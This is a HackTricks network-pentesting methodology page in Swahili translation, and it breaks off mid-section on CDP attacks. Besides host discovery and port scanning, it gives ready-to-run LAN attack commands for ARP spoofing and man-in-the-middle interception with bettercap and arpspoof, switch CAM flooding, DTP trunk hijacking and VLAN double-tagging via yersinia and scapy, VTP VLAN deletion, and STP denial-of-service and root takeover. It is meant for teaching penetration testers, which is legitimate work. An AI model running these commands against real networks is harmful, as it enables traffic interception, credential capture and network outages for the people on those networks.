hacktricks/generic-methodologies-and-resources/pentesting-network

Pentesting Network

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

• Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
• Pata swag rasmi ya PEASS & HackTricks
• Gundua The PEASS Family, mkusanyiko wetu wa NFTs ya kipekee
• Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.

Mshahara wa mdudu: jiandikishe kwa Intigriti, jukwaa la malipo ya mdudu la premium lililoundwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata malipo hadi $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Kugundua watumishi kutoka nje

Hii ni sehemu fupi kuhusu jinsi ya kupata IP zinazojibu kutoka kwenye Mtandao.
Katika hali hii, una wigo wa IP (labda hata aina kadhaa) na unataka tu kujua IP zipi zinajibu.

ICMP

Hii ni njia rahisi na haraka ya kugundua ikiwa mwenyeji yupo au la.
Unaweza kujaribu kutuma baadhi ya pakiti za ICMP na kutarajia majibu. Njia rahisi ni kutuma ombi la echo na kutarajia majibu. Unaweza kufanya hivyo kwa kutumia ping rahisi au kutumia fping kwa aina kadhaa.
Unaweza pia kutumia nmap kutuma aina nyingine za pakiti za ICMP (hii itazuia filters za ombi-jibu la echo la kawaida la ICMP).

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

Ugunduzi wa Bandari ya TCP

Ni jambo la kawaida kukuta kuwa aina zote za pakiti za ICMP zinafungwa. Kwa hivyo, unachoweza kufanya ni jaribu kupata bandari zilizofunguliwa ili kujua kama mwenyeji yupo. Kila mwenyeji ana bandari 65535, kwa hivyo, ikiwa una "wigo mkubwa" huwezi kujaribu kama kila bandari ya kila mwenyeji imefunguliwa au la, hii itachukua muda mwingi.
Kwa hivyo, unahitaji skana ya bandari haraka (masscan) na orodha ya bandari zinazotumiwa zaidi:

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

Unaweza pia kufanya hatua hii na nmap, lakini ni polepole kidogo na nmap ina matatizo ya kutambua watumishi wanaofanya kazi.

Ugunduzi wa Bandari ya HTTP

Hii ni ugunduzi wa bandari ya TCP tu unaofaa wakati unataka kuzingatia ugunduzi wa huduma za HTTP:

masscan -p80,443,8000-8100,8443 199.66.11.0/24

Ugunduzi wa Bandari ya UDP

Unaweza pia jaribu kuangalia ikiwa kuna bandari ya UDP wazi ili kuamua ikiwa unapaswa kuzingatia zaidi mwenyeji. Kwa kuwa huduma za UDP kawaida hazijibu na data yoyote kwa pakiti ya kawaida ya uchunguzi wa UDP tupu, ni vigumu kusema ikiwa bandari inafanyiwa uchujaji au iko wazi. Njia rahisi ya kuamua hii ni kwa kutuma pakiti inayohusiana na huduma inayofanya kazi, na kwa kuwa hujui huduma ipi inayofanya kazi, unapaswa kujaribu ile inayowezekana zaidi kulingana na nambari ya bandari:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

Mstari wa nmap uliopendekezwa hapo awali utajaribu bandari za UDP za juu 1000 kwenye kila mwenyeji ndani ya kikomo cha /24 lakini hata hii itachukua >20min. Ikiwa unahitaji matokeo haraka zaidi unaweza kutumia udp-proto-scanner: ./udp-proto-scanner.pl 199.66.11.53/24 Hii itatuma jaribio la UDP kwenye bandari inayotarajiwa (kwa kikomo cha /24 hii itachukua dakika 1 tu): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen, citrix, daytime, db2, echo, gtpv1, ike,ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, time, xdmcp.

Ugunduzi wa Bandari za SCTP

#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>

Pentesting Wifi

Hapa unaweza kupata mwongozo mzuri wa mashambulizi yote maarufu ya Wifi wakati wa kuandika:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Kugundua wenyewe kutoka ndani

Ikiwa uko ndani ya mtandao, moja ya mambo ya kwanza utakayotaka kufanya ni kugundua wenyewe wengine. Kulingana na kelele ngapi unayoweza/utakaofanya, hatua tofauti zinaweza kufanywa:

Pasifiki

Unaweza kutumia zana hizi kugundua wenyewe kwa njia ya pasifiki ndani ya mtandao uliounganishwa:

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

Kazi

Tahadhari kwamba mbinu zilizoelezwa katika Kugundua watumiaji kutoka nje (Kugundua Bandari za TCP/HTTP/UDP/SCTP) zinaweza kutumika hapa pia.
Lakini, kwa kuwa wewe uko kwenye mtandao sawa na watumiaji wengine, unaweza kufanya vitendo zaidi:

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

Active ICMP

Tafadhali kumbuka kuwa mbinu zilizoelezwa katika Kugundua watumiaji kutoka nje (ICMP) zinaweza kuwekwa hapa pia.
Lakini, kwa kuwa wewe ni katika mtandao huo huo kama watumiaji wengine, unaweza kufanya vitendo zaidi:

• Ikiwa unafanya ping kwa anwani ya utangazaji wa subnet, ping inapaswa kuwasili kwa kila mwenyeji na wanaweza kujibu kwako: ping -b 10.10.5.255
• Kwa kupinga anwani ya utangazaji wa mtandao, unaweza hata kupata watumiaji ndani ya subnet nyingine: ping -b 255.255.255.255
• Tumia bendera -PE, -PP, -PM ya nmap kufanya ugunduzi wa mwenyeji kwa kutuma mtawaliwa ICMPv4 echo, timestamp, na ombi la subnet mask: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lan hutumiwa kuwasha kompyuta kupitia ujumbe wa mtandao. Pakiti ya uchawi inayotumiwa kuwasha kompyuta ni pakiti ambapo MAC Dst inatolewa na kisha inarudiwa mara 16 ndani ya pakiti hiyo hiyo.
Kwa hivyo aina hii ya pakiti kawaida hutumwa katika ethernet 0x0842 au katika pakiti ya UDP kwenye bandari 9.
Ikiwa hakuna [MAC] inayotolewa, pakiti hiyo hutumwa kwa utangazaji wa ethernet (na MAC ya utangazaji itakuwa ile inayorudiwa).

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

Kuchunguza Wenyeweji

Baada ya kugundua IPs zote (za nje au za ndani) unazotaka kuchunguza kwa undani, hatua tofauti zinaweza kufanywa.

TCP

• Bandari iliyofunguliwa: SYN --> SYN/ACK --> RST
• Bandari iliyofungwa: SYN --> RST/ACK
• Bandari iliyofichwa: SYN --> [HAKUNA MAJIBU]
• Bandari iliyofichwa: SYN --> Ujumbe wa ICMP

# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

Kuna njia 2 za kuchunguza bandari ya UDP:

• Tuma pakiti ya UDP na angalia majibu ya ICMP unreachable ikiwa bandari imefungwa (katika visa vingine ICMP itakuwa imezuiwa hivyo hautapokea habari yoyote ikiwa bandari imefungwa au wazi).
• Tuma datagrams iliyopangwa ili kupata majibu kutoka kwa huduma (k.m., DNS, DHCP, TFTP, na nyinginezo, kama ilivyoorodheshwa katika nmap-payloads). Ikiwa unapokea majibu, basi bandari iko wazi.

Nmap itachanganya chaguo zote mbili kwa kutumia "-sV" (uchunguzi wa UDP ni polepole sana), lakini kumbuka kuwa uchunguzi wa UDP ni polepole kuliko uchunguzi wa TCP:

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

Uchunguzi wa SCTP

SCTP (Itifaki ya Udhibiti wa Usafirishaji wa Mto) imeundwa kutumiwa pamoja na TCP (Itifaki ya Udhibiti wa Usafirishaji) na UDP (Itifaki ya Datagram ya Mtumiaji). Lengo kuu la SCTP ni kurahisisha usafirishaji wa data ya simu juu ya mitandao ya IP, kwa kufanana na vipengele vingi vya uaminifu vilivyopatikana katika Mfumo wa Ishara 7 (SS7). SCTP ni sehemu muhimu ya familia ya itifaki ya SIGTRAN, ambayo inalenga kusafirisha ishara za SS7 juu ya mitandao ya IP.

Msaada wa SCTP unatolewa na mifumo mbalimbali ya uendeshaji, kama vile IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, na VxWorks, ikionyesha kukubalika na umuhimu wake katika uga wa mawasiliano na mitandao.

Nmap inatoa uchunguzi wa SCTP kwa njia mbili tofauti: -sY na -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

Kuepuka IDS na IPS

{% content-ref url="ids-evasion.md" %} ids-evasion.md {% endcontent-ref %}

Chaguo zaidi za nmap

{% content-ref url="nmap-summary-esp.md" %} nmap-summary-esp.md {% endcontent-ref %}

Kufichua Anwani za IP za Ndani

Routers, firewalls, na vifaa vya mtandao vilivyokosewa mipangilio mara nyingine hujibu kwa uchunguzi wa mtandao kwa kutumia anwani za chanzo zisizo za umma. tcpdump inaweza kutumika kutambua pakiti zinazopokelewa kutoka kwa anwani za kibinafsi wakati wa majaribio. Hasa, kwenye Kali Linux, pakiti zinaweza kukamatwa kwenye kiolesura cha eth2, ambacho kinapatikana kutoka kwenye mtandao wa umma. Ni muhimu kuzingatia kwamba ikiwa usanidi wako uko nyuma ya NAT au Firewall, pakiti kama hizo zinaweza kufutwa.

tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

Kusikiliza

Kwa kusikiliza unaweza kujifunza maelezo ya safu za IP, ukubwa wa subnet, anwani za MAC, na majina ya mwenyeji kwa kukagua fremu na pakiti zilizorekodiwa. Ikiwa mtandao umekosa usanidi au kitambaa cha kubadilisha kina msongo, wadukuzi wanaweza kukamata habari nyeti kupitia kusikiliza mtandao kwa njia ya kupitisha.

Ikiwa mtandao wa Ethernet uliowekwa vizuri unatumia kubadilisha, utaona tu fremu za matangazo na vifaa vilivyolengwa kwa anwani yako ya MAC.

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

Mtu anaweza, pia, kukamata pakiti kutoka kwenye kifaa cha mbali kupitia kikao cha SSH na Wireshark kama kiolesura cha mtumiaji (GUI) kwa wakati halisi.

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

Bettercap

Bettercap ni chombo cha nguvu cha kufanya uchunguzi wa mitandao na kudhibiti trafiki. Inatoa uwezo wa kufanya shambulio la kati (MITM) na kuchunguza shughuli za mtandao. Chombo hiki kinaweza kutumiwa katika mchakato wa upimaji wa usalama wa mtandao ili kugundua udhaifu na kufanya majaribio ya kuingilia kati katika mawasiliano ya mtandao.

Kufunga Bettercap

Unaweza kufunga Bettercap kwa kufuata hatua hizi:

1. Pata na usakinishe Go kwenye mfumo wako.
2. Sakinisha dependensi zinazohitajika kwa kutumia amri apt-get install build-essential libpcap-dev libusb-1.0-0-dev libnetfilter-queue-dev.
3. Sakinisha Bettercap kwa kutumia amri go get github.com/bettercap/bettercap.

Kuanza Bettercap

Baada ya kufunga Bettercap, unaweza kuanza kwa kufuata hatua hizi:

1. Hakikisha kuwa kadi yako ya mtandao imeunganishwa na mtandao.
2. Fungua terminal na tumia amri bettercap -iface <interface> kuanza Bettercap, ambapo <interface> ni jina la kadi ya mtandao unayotumia.

Kufanya Shambulio la Kati (MITM)

Bettercap inatoa uwezo wa kufanya shambulio la kati (MITM) kwa kuchukua udhibiti wa mawasiliano kati ya vifaa vya mtandao. Unaweza kufanya shambulio la kati kwa kufuata hatua hizi:

1. Kuanza Bettercap kama ilivyoelezwa hapo juu.
2. Tumia amri set arp.spoof.targets <target_ip> kuchagua lengo la shambulio la kati, ambapo <target_ip> ni anwani ya IP ya kifaa unachotaka kushambulia.
3. Tumia amri arp.spoof on kuanza shambulio la kati.

Kuchunguza Shughuli za Mtandao

Bettercap inaweza kutumika kuchunguza shughuli za mtandao kwa kufuatilia na kurekodi trafiki ya mtandao. Unaweza kufanya hivyo kwa kufuata hatua hizi:

1. Kuanza Bettercap kama ilivyoelezwa hapo juu.
2. Tumia amri net.sniff on kuanza kuchunguza trafiki ya mtandao.
3. Trafiki ya mtandao itaonyeshwa kwenye terminal na itahifadhiwa kwenye faili ya kumbukumbu.

Bettercap ni chombo muhimu katika mchakato wa upimaji wa usalama wa mtandao na kinaweza kutumiwa kwa uchunguzi wa mitandao na kufanya majaribio ya kuingilia kati katika mawasiliano ya mtandao.

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

Bila shaka.

Kukamata siri

Unaweza kutumia zana kama https://github.com/lgandx/PCredz kuchambua siri kutoka kwa pcap au kiolesura hai.

Mashambulizi ya LAN

ARP spoofing

ARP Spoofing inajumuisha kutuma ARPResponses za bure ili kuonyesha kuwa IP ya kifaa chetu ina MAC ya kifaa chetu. Kisha, mwathirika atabadilisha jedwali la ARP na kuwasiliana na kifaa chetu kila wakati anapotaka kuwasiliana na IP iliyodanganywa.

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

Arpspoof

Arpspoof ni zana ya kudanganya mitandao ambayo inaruhusu hacker kudhibiti mawasiliano kati ya vifaa vya mtandao. Kwa kutumia Arpspoof, hacker anaweza kudanganya vifaa vya mtandao kwa kubadilisha meza ya ARP (Address Resolution Protocol) na kupeleka trafiki kupitia kifaa chao. Hii inawezesha hacker kusoma, kubadilisha, au hata kuzuia mawasiliano kati ya vifaa vya mtandao.

Arpspoof ni zana yenye nguvu katika uwanja wa uchunguzi wa usalama na pentesting. Inaweza kutumiwa kwa madhumuni mbalimbali, kama vile kuchunguza udhaifu katika mtandao, kufuatilia mawasiliano, au hata kutekeleza mashambulizi ya kati (man-in-the-middle attacks).

Kwa kufanya Arpspoof, hacker anaweza kupata ufikiaji usioidhinishwa kwa mawasiliano ya mtandao na kudhibiti mawasiliano kati ya vifaa vya mtandao. Hii inaweza kuwa hatari kubwa kwa usalama wa mtandao, na ndio sababu ni muhimu kwa wataalamu wa usalama kuelewa jinsi ya kugundua na kuzuia mashambulizi ya Arpspoof.

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

Kujaa kwa MAC - Kujaa kwa CAM

Jaza meza ya CAM ya swichi kwa kutuma pakiti nyingi na anwani tofauti za MAC chanzo. Wakati meza ya CAM imejaa, swichi huanza kutenda kama kituo (kutangaza trafiki yote).

macof -i <interface>

Katika swichi za kisasa, udhaifu huu umetatuliwa.

Mashambulizi ya 802.1Q VLAN / DTP

Trunking ya Kudumu

Itifaki ya Trunking ya Kudumu (DTP) imeundwa kama itifaki ya safu ya kiungo ili kurahisisha mfumo wa moja kwa moja wa trunking, kuruhusu swichi kuchagua bandari kiotomatiki kwa hali ya trunk (Trunk) au hali isiyo ya trunk. Kuweka DTP mara nyingi huchukuliwa kama ishara ya muundo duni wa mtandao, ikisisitiza umuhimu wa kuweka mizizi kwa mikono tu pale inapohitajika na kuhakikisha kuna nyaraka sahihi.

Kwa chaguo-msingi, bandari za swichi zimefungwa kufanya kazi katika hali ya Kiotomatiki ya Kudumu, maana yake ni kwamba ziko tayari kuanzisha trunking ikiombwa na swichi jirani. Wasiwasi wa usalama unatokea wakati mchunguzi wa mtandao au mshambuliaji anapojiunganisha na swichi na kutuma fremu ya DTP Desirable, ikilazimisha bandari kuingia kwenye hali ya trunk. Hatua hii inawezesha mshambuliaji kuorodhesha VLAN kupitia uchambuzi wa fremu za STP na kuepuka kugawanyika kwa VLAN kwa kuweka vipengele vya kawaida.

Uwepo wa DTP katika swichi nyingi kwa chaguo-msingi unaweza kutumiwa na wapinzani kujifanya kuwa tabia ya swichi, hivyo kupata ufikiaji wa trafiki kwenye VLAN zote. Skrini ya dtpscan.sh hutumiwa kufuatilia kiolesura, kuonyesha ikiwa swichi iko katika hali ya Chaguo-msingi, Trunk, Kudumu, Kiotomatiki, au Kufikia - hali ya mwisho ikiwa ndiyo pekee inayostahimili mashambulizi ya VLAN hopping. Zana hii inathibitisha hali ya udhaifu wa swichi.

Ikiwa udhaifu wa mtandao utabainika, zana ya Yersinia inaweza kutumika kuwezesha "trunking" kupitia itifaki ya DTP, kuruhusu uchunguzi wa pakiti kutoka kwenye VLAN zote.

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

Kwa kuchunguza VLANs, pia ni pamoja na uwezekano wa kuzalisha fremu ya DTP Desirable na skripti DTPHijacking.py. Usikatize skripti kwa hali yoyote. Inasambaza DTP Desirable kila baada ya sekunde tatu. Vipindi vya mizigo vilivyoundwa kwa kudumu kwenye swichi hufanya kazi kwa dakika tano tu. Baada ya dakika tano, mizigo inaondolewa.

sudo python3 DTPHijacking.py --interface eth0

Ningependa kuelezea kwamba Access/Desirable (0x03) inaonyesha kuwa fremu ya DTP ni ya aina ya Desirable, ambayo inaambia bandari kubadili kwenye hali ya Trunk. Na 802.1Q/802.1Q (0xa5) inaonyesha aina ya kufunga ya 802.1Q.

Kwa kuchambua fremu za STP, tunajifunza kuhusu uwepo wa VLAN 30 na VLAN 60.

Kuvamia VLAN maalum

Marafiki unapojua Kitambulisho cha VLAN na thamani za IP, unaweza kuweka kiolesura cha kubuni kushambulia VLAN maalum.
Ikiwa DHCP haipatikani, basi tumia ifconfig kuweka anwani ya IP ya tuli.

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
RX packets:19 errors:0 dropped:0 overruns:0 frame:0
TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Mvamizi wa VLAN Hopper wa Kiotomatiki

Shambulio lililozungumziwa la Dynamic Trunking na kuunda vipengele vya kubaini na kugundua watumiaji ndani ya VLAN nyingine linatekelezwa kwa kiotomatiki na chombo: https://github.com/nccgroup/vlan-hopping---frogger

Utagaji wa Mara Mbili

Ikiwa mvamizi anajua thamani ya MAC, IP na kitambulisho cha VLAN cha mwenyeji wa mwathirika, anaweza kujaribu kutumia utagaji wa mara mbili kwenye fremu na VLAN yake iliyopangwa na VLAN ya mwathirika na kutuma pakiti. Kwani mwathirika hataweza kuunganisha tena na mvamizi, chaguo bora kwa mvamizi ni kuwasiliana kupitia UDP kwa itifaki ambazo zinaweza kutekeleza hatua za kuvutia (kama vile SNMP).

Chaguo lingine kwa mvamizi ni kuzindua uchunguzi wa bandari ya TCP kwa kudanganya IP inayodhibitiwa na mvamizi na inayopatikana na mwathirika (labda kupitia mtandao). Kisha, mvamizi anaweza kusikiliza kwenye mwenyeji wa pili aliye naye ikiwa inapokea baadhi ya pakiti kutoka kwa mwathirika.

Kutekeleza shambulio hili unaweza kutumia scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Kupita Kando kwa Segmentation ya VLAN ya Lateral

Ikiwa una upatikanaji wa swichi ambayo unaunganishwa moja kwa moja, una uwezo wa kupita kando kwa segmentation ya VLAN ndani ya mtandao. Tu badilisha bandari kuwa hali ya mizunguko (inayojulikana pia kama mizunguko), tengeneza vipengele bandia na vitambulisho vya VLAN za lengo, na sanidi anwani ya IP. Unaweza kujaribu kuomba anwani kwa njia ya kudumu (DHCP) au unaweza kuweka sanidi yake kwa njia ya kudumu. Inategemea na hali.

{% content-ref url="lateral-vlan-segmentation-bypass.md" %} lateral-vlan-segmentation-bypass.md {% endcontent-ref %}

Kupita Kando kwa VLAN Binafsi ya Tabaka la 3

Katika mazingira fulani, kama vile mitandao ya wireless ya wageni, mipangilio ya kutengwa kwa bandari (inayojulikana pia kama VLAN binafsi) imeanzishwa ili kuzuia wateja waliounganishwa kwenye kifaa cha upatikanaji wa wireless wasiweze kuwasiliana moja kwa moja. Walakini, njia imegunduliwa ambayo inaweza kuzunguka hatua hizi za kutengwa. Njia hii inatumia udhaifu wa kutokuwepo kwa ACL za mtandao au sanidi yao isiyofaa, kuruhusu pakiti za IP kuelekezwa kupitia router ili kufikia mteja mwingine kwenye mtandao huo.

Shambulio linatekelezwa kwa kuunda pakiti inayobeba anwani ya IP ya mteja wa marudio lakini na anwani ya MAC ya router. Hii inasababisha router kupeleka pakiti kimakosa kwa mteja wa lengo. Njia hii ni sawa na ile inayotumiwa katika Mashambulio ya Double Tagging, ambapo uwezo wa kudhibiti mwenyeji unaopatikana kwa muathirika hutumiwa kufexploit dosari ya usalama.

Hatua muhimu za Shambulio:

1. Kuunda Pakiti: Pakiti inaundwa maalum ili iwe na anwani ya IP ya mteja wa lengo lakini na anwani ya MAC ya router.
2. Kutumia Tabia ya Router: Pakiti iliyoandaliwa inatumwa kwa router, ambayo, kutokana na sanidi yake, inaelekeza pakiti kwa mteja wa lengo, ikipita kando ya kutengwa inayotolewa na mipangilio ya VLAN binafsi.

Mashambulio ya VTP

VTP (VLAN Trunking Protocol) inasimamia usimamizi wa VLAN. Inatumia nambari za marekebisho kuweka usahihi wa hifadhidata ya VLAN; mabadiliko yoyote huongeza nambari hii. Swichi huchukua sanidi zenye nambari za marekebisho ya juu, zikisasisha hifadhidata yao ya VLAN.

Majukumu ya Kikoa cha VTP

• Seva ya VTP: Inasimamia VLAN - inaunda, inafuta, inabadilisha. Inatangaza matangazo ya VTP kwa wanachama wa kikoa.
• Mteja wa VTP: Hupokea matangazo ya VTP ili kusawazisha hifadhidata yake ya VLAN. Jukumu hili linazuiliwa kutoka kwa mabadiliko ya sanidi ya VLAN ya ndani.
• VTP ya Wazi: Haishiriki katika sasisho za VTP lakini inatuma matangazo ya VTP. Haiathiriwa na mashambulio ya VTP, inaendeleza nambari ya marekebisho ya sifuri kwa kudumu.

Aina za Matangazo ya VTP

• Matangazo ya Muhtasari: Yaliyotangazwa na seva ya VTP kila sekunde 300, yakibeba habari muhimu za kikoa.
• Matangazo ya Sehemu: Yanatumwa baada ya mabadiliko ya sanidi ya VLAN.
• Ombi la Matangazo: Linalotolewa na mteja wa VTP kuomba Matangazo ya Muhtasari, kawaida kujibu ugunduzi wa nambari ya marekebisho ya sanidi ya juu.

Udhaifu wa VTP unaweza kuchexploitwa tu kupitia bandari za mizunguko kwani matangazo ya VTP yanazunguka tu kupitia bandari hizo. Hali ya mashambulio baada ya mashambulio ya DTP inaweza kuelekezwa kwa VTP. Zana kama Yersinia zinaweza kurahisisha mashambulio ya VTP, lengo likiwa kufuta hifadhidata ya VLAN, kusababisha usumbufu kwenye mtandao.

Maelezo: Majadiliano haya yanahusu toleo la VTP 1 (VTPv1).

%% yersinia -G # Launch Yersinia in graphical mode ```

Katika hali ya grafu ya Yersinia, chagua chaguo la kufuta VTP vlans ili kusafisha kuhifadhi ya VLAN.

Mashambulizi ya STP

Ikiwa huwezi kukamata fremu za BPDU kwenye vipengele vyako, ni jambo lisilowezekana kwamba utafanikiwa katika shambulizi la STP.

STP BPDU DoS

Kwa kutuma idadi kubwa ya BPDUs TCP (Taarifa ya Mabadiliko ya Topolojia) au Conf (BPDUs ambazo hutumwa wakati topolojia inajengwa), swichi zinazidiwa na kusitisha kufanya kazi kwa usahihi.

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

Shambulio la STP TCP

Unapotuma TCP, jedwali la CAM la swichi litafutwa baada ya sekunde 15. Kisha, ikiwa unatuma pakiti za aina hii kwa muda usioisha, jedwali la CAM litarejeshwa kwa muda usioisha (au kila sekunde 15) na wakati linapojirejesha, swichi inajitendea kama kituo.

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

Shambulio la Mzizi wa STP

Mshambuliaji anajifanya kuwa kama swichi ili kuwa mzizi wa STP wa mtandao. Kisha, data zaidi itapita kupitia yeye. Hii ni ya kuvutia wakati unapounganishwa na swichi mbili tofauti.
Hii inafanywa kwa kutuma pakiti za BPDUs CONF zikisema kuwa thamani ya kipaumbele ni ndogo kuliko kipaumbele halisi cha swichi ya mzizi ya sasa.

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

Ikiwa mshambuliaji ameunganishwa na swichi 2, anaweza kuwa mzizi wa mti mpya na trafiki yote kati ya hizo swichi itapita kupitia yeye (shambulio la MITM litatekelezwa).

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

Mashambulizi ya CDP

Cisco Discovery Protocol (CDP) ni muhimu kwa mawasiliano kati ya vifaa vya Cisco, ikiruhusu vifaa hivyo kutambulishana na kushiriki maelezo ya usanidi.

Ukusanyaji wa Data kwa Njia ya Kupita

CDP imepangwa kutangaza habari kupitia bandari zote, ambayo inaweza kusababisha hatari ya usalama. Mshambuliaji, baada ya kuunganisha kwenye bandari ya swichi, anaweza kutumia zana za kuchunguza mtandao kama Wireshark, tcpdump, au Yersinia. Hatua hii inaweza kufichua data nyeti kuhusu kifaa cha mtandao, ikiwa ni pamoja na mfano wake na toleo la Cisco IOS linalotumika. Mshambuliaji anaweza kisha kulenga udhaifu maalum katika toleo la Cisco IOS lililotambuliwa.

Kuchochea Mafuriko ya Jedwali la CDP

